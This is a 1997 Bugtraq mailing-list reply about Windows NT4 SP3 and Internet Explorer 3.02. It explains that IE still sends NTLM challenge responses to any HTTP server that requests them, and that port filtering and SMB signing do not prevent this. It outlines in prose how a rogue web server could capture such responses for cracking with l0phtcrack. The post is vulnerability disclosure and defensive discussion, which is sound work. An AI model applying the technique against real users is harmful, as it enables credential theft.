Bugtraq mailing list archives
Re: NT4.0 SP3 Still vulnerable
From: Russ.Cooper () RC ON CA (Russ)
Date: Fri, 16 May 1997 14:07:25 -0400
As far as I know, IE 3.02 corrected only sending NTLM logins thru HTTP connections, and I suppose you are talking about capturing username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).
This information is incorrect. IE 3.02 does not prevent NTLM negotiations to take place via HTTP to any server which requests NTLM authentication.
I'm still downloading SP3, but after a look at the readme it looked me
that
SP3 could empower a administrator to fix such bug by enabling the SMB signing feature; it would not fix it at installation.
SMB signing does not alter NTLM negotiations, it modifies SMB sessions.
And with or without SP3, filtering routers blocking 135/137/138/139
ports
make this exploit and similar ones limited to Intranets.
This information is incorrect. As long as IE is willing to negotiate an authenticated connection to a HTTP server using NTLM, blocking the ports you mention will have no effect. Its still possible to retrieve the information via the HTTP channel. Granted, with the above ports closed it may not be possible to use this information to exploit a system through your routers, but this doesn't alter the fact that the information may become known and exploited internally.
Hasn't one exploit code been released to SAMBA-DIGEST ? It captures the password hashes, which someone could pass to l0phtcrack and similar crackers.
I think Aaron was likely referring to the code required on a non-NT web server to get a browser to send an NTLM challenge response to a pre-defined challenge, capture it, parse it to obtain the plain-text equivalent which could then be input into some cracking program. Cheers, Russ R.C. Consulting, Inc. - NT/Internet Security owner of the NTBugTraq mailing list: http://ntbugtraq.rc.on.ca/index.html
Current thread:
- Re: NT4.0 SP3 Still vulnerable Rubens Kuhl Jr. (May 15)
- <Possible follow-ups>
- Re: NT4.0 SP3 Still vulnerable Aaron Spangler (May 16)
- Re: NT4.0 SP3 Still vulnerable Russ (May 16)
- Re: NT4.0 SP3 Still vulnerable Aaron Spangler (May 16)